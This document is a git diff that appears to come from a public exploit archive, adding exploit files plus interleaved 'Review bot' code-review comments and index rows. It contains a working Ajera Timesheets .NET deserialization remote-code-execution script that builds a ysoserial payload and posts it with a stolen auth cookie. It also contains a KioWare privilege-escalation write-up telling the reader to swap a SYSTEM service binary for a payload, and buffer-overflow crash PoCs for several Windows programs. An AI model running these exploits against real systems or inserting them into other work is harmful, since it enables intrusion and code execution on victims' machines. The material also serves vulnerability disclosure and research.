+# Software Link : http://www.nsauditor.com/downloads/blueauditor_setup.exe
+# Tested Version: 1.7.2.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to Produce the Crash:
+# 1.- Run python code : python BlueAuditor_1.7.2.0.py
+# 2.- Open BlueAuditor_1.7.2.0.txt and copy content to clipboard
+# 3.- Open BlueAuditor
+# 4.- Register -> Enter Registration Code...
+# 5.- Name: -> l4m5
+# 6.- Paste ClipBoard on "Key:"
+# 7.- OK
+# 8.- Crashed
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 256
+f = open ("BlueAuditor_1.7.2.0.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46088.py b/exploits/windows/dos/46088.py
new file mode 100755
index 000000000..958926254
--- /dev/null
+++ b/exploits/windows/dos/46088.py
@@ -0,0 +1,25 @@
+# Exploit Title: SpotFTP Password Recover 2.4.2 - 'Name' Denial of Service (PoC)
+# Discovery by: Luis Martinez
+# Discovery Date: 2019-01-04
+# Vendor Homepage: www.nsauditor.com
+# Software Link : http://www.nsauditor.com/downloads/spotftp_setup.exe
+# Tested Version: 2.4.2
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to Produce the Crash:
+# 1.- Run python code : python SpotFTP_Password_Recover_2.4.2.py
+# 2.- Open SpotFTP_Password_Recover_2.4.2.txt and copy content to clipboard
+# 3.- Open SpotFTP
+# 4.- Register -> Enter Registration Code...
+# 5.- Paste ClipBoard on "Name:"
+# 6.- Key: -> L4M5
+# 7.- OK
+# 8.- Crashed
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 256
+f = open ("SpotFTP_Password_Recover_2.4.2.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46089.py b/exploits/windows/dos/46089.py
new file mode 100755
index 000000000..ce237e146
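Review bot: The `#!/usr/bin/env python` line is the 20th line of the file, after the comment block, so it is not a shebang and the file is not directly executable despite the `100755` mode; move it to line 1. `buffer` shadows the Python 2 builtin of the same name, and the file is written without `with open(...) as f:`, which would also drop the explicit `f.close()`. More importantly the advisory records only that a 256-byte registration key crashed the dialog — no exception code, register state or faulting module — so "Denial of Service" is an assumption rather than a finding; attach the crash output so readers can distinguish a handled exception from an overwrite worth investigating.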
--- /dev/null
+++ b/exploits/windows/dos/46089.py
@@ -0,0 +1,30 @@
+# Exploit Title: Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)
+# Discovery by: Luis Martinez
+# Discovery Date: 2019-01-04
+# Vendor Homepage: https://www.foscam.es/
+# Software Link : https://www.foscam.es/descarga/FoscamVMS_1.1.4.9.zip
+# Tested Version: 1.1.4.9
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to Produce the Crash:
+# 1.- Run python code : python FoscamVMS_1.1.4.9.py
+# 2.- Open FoscamVMS_1.1.4.9.txt and copy content to clipboard
+# 3.- Open FoscamVMS
+# 4.- User Name -> admin
+# 5.- Password ->
+# 6.- Login
+# 7.- System Settings
+# 8.- User Management Settings
+# 9.- Add
+# 10.- Paste ClipBoard on "Username"
+# 11.- Password -> P4ssw0rd
+# 12.- Save
+# 13.- Crashed
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 150
+f = open ("FoscamVMS_1.1.4.9.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/46093.txt b/exploits/windows/local/46093.txt
new file mode 100644
index 000000000..7f0e8778e
--- /dev/null
+++ b/exploits/windows/local/46093.txt
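Review bot: Steps 4-9 require logging into the VMS as `admin` and opening User Management before the 150-byte `Username` is pasted, so this is a post-authentication crash in an administrative dialog rather than an unauthenticated DoS, and the title and `Vulnerability Type` line should say so. As with the sibling PoCs no crash context is recorded, so whether the length limit is a caught exception or an actual overwrite is unknown; step 5 also prints `Password ->` with nothing after it, so the login password used is unclear. The `#!/usr/bin/env python` line is the 25th line of the file and therefore inert.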
@@ -0,0 +1,71 @@
+# Exploit Title : KioWare Server Version 4.9.6 - Weak Folder Permissions Privilege Escalation
+# Date : 10/12/2018
+# Exploit Author : Hashim Jawad - @ihack4falafel
+# Vendor Homepage : https://www.kioware.com/
+# Tested on : Windows Server 2016 Standard (x64)
+# CVE : CVE-2018-18435
+
+Description:
+============
+KioWare Server version 4.9.6 and older installs by default to "C:\kioware_com" with weak folder permissions granting any user full permission "Everyone: (F)" to the contents of the directory and it's sub-folders. In addition, the program installs a service called "KWSService" which runs as "Localsystem", this will allow any user to escalate privileges to "NT AUTHORITY\SYSTEM" by substituting the service's binary with a malicious one.
+
+Proof:
+======
+C:\>icacls c:\kioware_com
+C:\kioware_com Everyone:(OI)(CI)(F)
+ NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
+ BUILTIN\Administrators:(I)(OI)(CI)(F)
+ BUILTIN\Users:(I)(OI)(CI)(RX)
+ BUILTIN\Users:(I)(CI)(AD)
+ BUILTIN\Users:(I)(CI)(WD)
+ CREATOR OWNER:(I)(OI)(CI)(IO)(F)
+
+Successfully processed 1 files; Failed processing 0 files
+
+C:\>sc qc KWSService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: KWSService
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START (DELAYED)
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : "C:\kioware_com\KWSS.exe"
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : KWS Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\>icacls C:\kioware_com\KWSS.exe
+C:\kioware_com\KWSS.exe Everyone:(I)(F)
+ NT AUTHORITY\SYSTEM:(I)(F)
+ BUILTIN\Administrators:(I)(F)
+ BUILTIN\Users:(I)(RX)
+ WIN-ONKVVSNUHKV\test:(I)(F)
+
+Successfully processed 1 files; Failed processing 0 files
+
+C:\>
+
+Exploit:
+========
+Simply replace "KWSS.exe" with your preferred payload and wait for execution upon reboot.
+
+# Disclosure Timeline:
+# ====================
+# 10-13-18: Contacted vendor
+# 10-15-18: Vendor requested full report and POC
+# 10-15-18: Full report and POC sent
+# 10-16-18: Vendor was able to reproduce/validate the issue and filed a feature request
+# 10-16-18: Asked vendor to provide timeline for patch
+# 10-16-18: Requested CVE ID
+# 10-17-18: CVE-2018-18435 assigned
+# 10-17-18: Vendor requested 90 days timeline to patch/QA test
+# 12-20-18: Vendor sent patch and requested feedback
+# 12-22-18: Suggestions/modifications sent to Vendor
+# 12-24-18: Vendor sent new patch and requested feedback
+# 12-25-18: New Suggestions/modifications sent to Vendor
+# 12-26-18: Vendor sent new patch and requested feedback
+# 12-27-18: Vendor was notified that the latest patch is sufficient
+# 12-31-18: Vendor released new version (v4.9.9) and patch as well
+# 01-07-19: Vulnerability has been made public
\ No newline at end of file
diff --git a/exploits/windows/webapps/46086.txt b/exploits/windows/webapps/46086.txt
new file mode 100644
index 000000000..363f07f85
--- /dev/null
+++ b/exploits/windows/webapps/46086.txt
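Review bot: The remediation is only discoverable from the last timeline entries (the vendor released v4.9.9 on 12-31-18) while the Description section stops at the impact; a header line such as `# Fix : Upgrade to KioWare Server 4.9.9 (vendor patch, 12-31-18)` would let a reader triage without reading the disclosure log. The `icacls` proof on KWSS.exe also lists a non-inherited-looking ACE `WIN-ONKVVSNUHKV\test:(I)(F)` that the text never explains; it looks like a lab account on the test host, and either saying so or trimming it would keep the inherited `Everyone:(I)(F)` as the visible finding. The Description says "4.9.6 and older" while the title says "Version 4.9.6"; aligning both as "<= 4.9.6" removes the ambiguity.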
@@ -0,0 +1,60 @@ +# Exploit Title: Ajera Timesheets <= 9.10.16 - Deserialization of untrusted data +# Date: 2019-01-03 +# Exploit Author: Anthony Cole +# Vendor Homepage: https://www.deltek.com/en/products/project-erp/ajera +# Version: <= 9.10.16 +# Contact: http://twitter.com/acole76 +# Website: http://twitter.com/acole76 +# Tested on: Windows 2012 +# CVE: CVE-2018-20221 +# Category: webapps +# +# Ajera is a software written in .NET by Deltek. Version <= 9.10.16 allows an attacker to cause the software to deserialize untrusted data that can result in remote code execution. +# Secure/SAService.rem in Deltek Ajera Timesheets <= 9.10.16 are vulnerable to remote code execution via deserialization of untrusted user input from an authenticated user. The executed code will run as the IIS Application Pool that is running the application. +# + +import struct, sys, requests, zlib, argparse, urlparse, subprocess + +def run_command(command): + p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) + output = b'' + for line in iter(p.stdout.readline, b''): + output += line + + return output + +def isurl(urlstr): + try: + urlparse.urlparse(urlstr) + return urlstr + except: + raise argparse.ArgumentTypeError("invalid url") + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description='Ajera .NET Remoting Exlpoit') + parser.add_argument("--url", "-u", type=isurl, required=True, help="the url of the target.") + parser.add_argument("--cmd", "-c", required=True, help="the command to execute") + parser.add_argument("--auth", "-a", required=True, help="the ASPXAUTH cookie") + parser.add_argument("--version", "-v", required=False, help="the version of Ajera Server. 
8.9.9.0 => 8990", default="8990") + parser.add_argument("--ysoserial", "-y", required=True, help="the path to ysoserial.exe") + parser.add_argument("--proxy", "-p", type=isurl, required=False, help="ex: http://127.0.0.1:8080") + args = parser.parse_args() + + url_parts = urlparse.urlparse(args.url) + target_url = "%s://%s" % (url_parts.scheme, url_parts.netloc) + + proxies = {} + if(args.proxy != None): + proxy_parts = urlparse.urlparse(args.proxy) + proxies[proxy_parts.scheme] = "%s://%s" % (proxy_parts.scheme, proxy_parts.netloc) + + cmd = "/c " + args.cmd + size = len(cmd) + + serial_payload = run_command('%s -o raw -g TypeConfuseDelegate -f BinaryFormatter -c "%s"' % (args.ysoserial, args.cmd)) + + url = target_url + "/ajera/Secure/SAService.rem" + headers = {'Content-Type': 'application/octet-stream'} + cookies = {'.ASPXAUTH': args.auth} + payload = "\x04" + args.version + zlib.compress(serial_payload) + response = requests.post(url, headers=headers, cookies=cookies, data=payload, proxies=proxies, verify=False) \ No newline at end of file diff --git a/exploits/windows/webapps/46090.html b/exploits/windows/webapps/46090.html new file mode 100644 index 000000000..8bf741e41 --- /dev/null +++ b/exploits/windows/webapps/46090.html 
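Review bot: `isurl` never rejects anything: `urlparse.urlparse` does not raise on arbitrary strings, and the bare `except:` would also swallow `KeyboardInterrupt`, so `--url` and `--proxy` are effectively unvalidated; validate the parsed result instead, `parts = urlparse.urlparse(urlstr)` followed by `if not parts.scheme or not parts.netloc: raise argparse.ArgumentTypeError("invalid url")`. `cmd` and `size` in the `__main__` block are assigned and never used (the ysoserial invocation reads `args.cmd` directly), and `response` is never inspected, so those three assignments should go or be acted on. The argparse description misspells "Exploit" as "Exlpoit". The file is committed as `46086.txt` and indexed as text although it is a Python script; a `.py` name would match the other Python entries in this commit.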
@@ -0,0 +1,58 @@ +<-- + +Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 Cross-Site Request Forgery + + +Vendor: Leica Geosystems AG +Product web page: https://www.leica-geosystems.com +Affected version: 4.30.063 + 4.20.232 + 4.11.606 + 3.22.1818 + 3.10.1633 + 2.62.782 + 1.00.395 + +Summary: The Leica GR10 is the next generation GNSS reference station receiver +that combines the latest state-of-the-art technologies with a streamlined +'plug and play' workflow. Designed for a wide variety of GNSS reference station +applications, the Leica GR10 offers new levels of simplicity, reliability and +performance. + +Desc: The application interface allows users to perform certain actions via +HTTP requests without performing any validity checks to verify the requests. +This can be exploited to perform certain actions with administrative privileges +if a logged-in user visits a malicious web site. + +Tested on: BarracudaServer.com (WindowsCE) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2019-5502 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5502.php + + +18.12.2018 + +--> + + + + +
+ + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/windows/webapps/46091.html b/exploits/windows/webapps/46091.html new file mode 100644 index 000000000..3a48ee3df --- /dev/null +++ b/exploits/windows/webapps/46091.html @@ -0,0 +1,83 @@ +<-- + +Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 JS/HTML Code Injection + + +Vendor: Leica Geosystems AG +Product web page: https://www.leica-geosystems.com +Affected version: 4.30.063 + 4.20.232 + 4.11.606 + 3.22.1818 + 3.10.1633 + 2.62.782 + 1.00.395 + +Summary: The Leica GR10 is the next generation GNSS reference station receiver +that combines the latest state-of-the-art technologies with a streamlined +'plug and play' workflow. Designed for a wide variety of GNSS reference station +applications, the Leica GR10 offers new levels of simplicity, reliability and +performance. + +Desc: The application suffers from a stored XSS vulnerability. The issue is +triggered via unrestricted file upload while restoring a config file allowing +the attacker to upload an html or javascript file that will be stored in +/settings/poc.html. This can be exploited to execute arbitrary HTML or JS +code in a user's browser session in context of an affected site. + +Tested on: BarracudaServer.com (WindowsCE) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2019-5503 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5503.php + +Ref: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5502.php + + +18.12.2018 + +--> + + + + + +
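Review bot: The advisory block at the top of 46090.html opens with `<--` rather than `<!--`, which is not an HTML comment delimiter, so the whole header up to `-->` renders as visible page text instead of being hidden; the first line should be `<!--`. The same opener is used in 46091.html in the next hunk. The page bodies appear here only as bare `+` lines, which looks like the markup was stripped during extraction rather than being empty in the commit, so nothing can be said about the forms themselves from this view.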
+ +
+ + \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index a1073f50f..3b67e9331 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6234,6 +6234,10 @@ id,file,description,date,author,type,platform,port 46064,exploits/windows_x86-64/dos/46064.py,"NBMonitor Network Bandwidth Monitor 1.6.5.0 - 'Name' Denial of Service (PoC)",2019-01-02,"Luis Martínez",dos,windows_x86-64, 46071,exploits/multiple/dos/46071.html,"WebKit JSC - 'AbstractValue::set' Use-After-Free",2019-01-02,"Google Security Research",dos,multiple, 46072,exploits/multiple/dos/46072.js,"WebKit JSC - 'JSArray::shiftCountWithArrayStorage' Out-of-Bounds Read/Write",2019-01-02,"Google Security Research",dos,multiple, +46078,exploits/windows/dos/46078.html,"Microsoft Edge 44.17763.1.0 - NULL Pointer Dereference",2019-01-07,"Bogdan Kurinnoy",dos,windows, +46087,exploits/windows/dos/46087.py,"BlueAuditor 1.7.2.0 - 'Key' Denial of Service (PoC)",2019-01-07,"Luis Martínez",dos,windows, +46088,exploits/windows/dos/46088.py,"SpotFTP Password Recover 2.4.2 - 'Name' Denial of Service (PoC)",2019-01-07,"Luis Martínez",dos,windows, +46089,exploits/windows/dos/46089.py,"Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)",2019-01-07,"Luis Martínez",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 
@@ -10184,6 +10188,7 @@ id,file,description,date,author,type,platform,port
 46056,exploits/windows_x86/local/46056.py,"MAGIX Music Editor 3.1 - Buffer Overflow (SEH)",2018-12-27,bzyo,local,windows_x86,
 46058,exploits/windows_x86/local/46058.py,"Terminal Services Manager 3.1 - Local Buffer Overflow (SEH)",2018-12-27,bzyo,local,windows_x86,
 46059,exploits/windows_x86/local/46059.py,"Iperius Backup 5.8.1 - Buffer Overflow (SEH)",2018-12-27,bzyo,local,windows_x86,
+46093,exploits/windows/local/46093.txt,"KioWare Server Version 4.9.6 - Weak Folder Permissions Privilege Escalation",2019-01-07,"Hashim Jawad",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17051,6 +17056,7 @@ id,file,description,date,author,type,platform,port
 46053,exploits/multiple/remote/46053.py,"Kubernetes - (Authenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple,
 46073,exploits/linux/remote/46073.rb,"Hashicorp Consul - Remote Command Execution via Rexec (Metasploit)",2019-01-02,Metasploit,remote,linux,
 46074,exploits/linux/remote/46074.rb,"Hashicorp Consul - Remote Command Execution via Services API (Metasploit)",2019-01-02,Metasploit,remote,linux,
+46075,exploits/python/remote/46075.rb,"Mailcleaner - Authenticated Remote Code Execution (Metasploit)",2019-01-07,"Mehmet Ince",remote,python,443
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -40558,3 +40564,16 @@ id,file,description,date,author,type,platform,port
 46060,exploits/php/webapps/46060.txt,"bludit Pages Editor 3.0.0 - Arbitrary File Upload",2018-12-27,BouSalman,webapps,php,80
 46061,exploits/php/webapps/46061.txt,"WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload",2018-12-27,Kaimi,webapps,php,80
 46065,exploits/php/webapps/46065.py,"Vtiger CRM 7.1.0 - Remote Code Execution",2019-01-02,AkkuS,webapps,php,
+46076,exploits/php/webapps/46076.txt,"Embed Video Scripts - Persistent Cross-Site Scripting",2019-01-07,"Deyaa Muhammad",webapps,php,80
+46077,exploits/php/webapps/46077.txt,"All in One Video Downloader 1.2 - Authenticated SQL Injection",2019-01-07,"Deyaa Muhammad",webapps,php,80
+46079,exploits/php/webapps/46079.txt,"LayerBB 1.1.1 - Persistent Cross-Site Scripting",2019-01-07,0xB9,webapps,php,80
+46080,exploits/php/webapps/46080.txt,"MyBB OUGC Awards Plugin 1.8.3 - Persistent Cross-Site Scripting",2019-01-07,0xB9,webapps,php,80
+46081,exploits/cgi/webapps/46081.txt,"PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Scripting",2019-01-07,"Kumar Saurav",webapps,cgi,80
+46082,exploits/php/webapps/46082.txt,"phpMoAdmin MongoDB GUI 1.1.5 - Cross-Site Request Forgery / Cross-Site Scripting",2019-01-07,"Ozer Goker",webapps,php,80
+46083,exploits/php/webapps/46083.txt,"Wordpress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation",2019-01-07,"Noman Riffat",webapps,php,80
+46084,exploits/php/webapps/46084.txt,"MyT Project Management 1.5.1 - 'Charge[group_total]' SQL Injection",2019-01-07,"Mehmet Onder",webapps,php,80
+46085,exploits/php/webapps/46085.txt,"Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal",2019-01-07,"Pongtorn Angsuchotmetee_ Vittawat Masaree",webapps,php,80
+46086,exploits/windows/webapps/46086.txt,"Ajera Timesheets 9.10.16 - Deserialization of Untrusted Data",2019-01-07,"Anthony Cole",webapps,windows,
+46090,exploits/windows/webapps/46090.html,"Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery",2019-01-07,LiquidWorm,webapps,windows,80
+46091,exploits/windows/webapps/46091.html,"Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection",2019-01-07,LiquidWorm,webapps,windows,
+46092,exploits/hardware/webapps/46092.py,"Huawei E5330 21.210.09.00.158 - Cross-Site Request Forgery (Send SMS)",2019-01-07,"Nathu Nandwani",webapps,hardware,